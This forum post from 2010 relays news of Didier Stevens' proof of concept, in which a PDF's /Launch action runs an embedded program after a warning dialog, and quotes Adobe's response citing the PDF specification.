Posted by: Samker
« on: 01. April 2010., 19:15:27 »The only thing blocking a PDF file written by security researcher Didier Stevens from harming your system is a warning dialog: http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
With some slight tweaking of the warning, and some crafty social engineering, your system is a sitting duck for whatever program is embedded in that PDF.
"With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs)."
The culprit here is simply an alternative way of launching commands in a PDF (/launch /action). With some further technique applied to surreptitiously embed the executable (Stevens understandably doesn't go into detail about this part), the PDF is able to launch any program its creator embeds as long as the user clicks OK at the warning. Since the warning can be modified with some more clever hacking, this isn't a very big hurdle to overcome. Simply change the warning to an encouraging message convincing the user to open the file, and you're in. Foxit PDF Reader doesn't even display the warning message, making this threat even worse.
Adobe responded to the issue, according to Threatpost, by saying:
"Didier Stevens’ demo relies on functionality defined in the PDF specification, which is an ISO standard (ISO PDF 32000-1:2008). Section 12.6.4.5 of the specification defines the /launch command. This is an example of powerful functionality relied on by some users that also carries potential risks when used incorrectly. The warning message provided in Adobe Reader and Adobe Acrobat includes strong wording advising users to only open and execute the file if it comes from a trusted source. Adobe takes the security of our products and technologies very seriously; we are always evaluating ways to allow end-users and administrators to better manage and configure features like this one to mitigate potential associated risks."
(NW)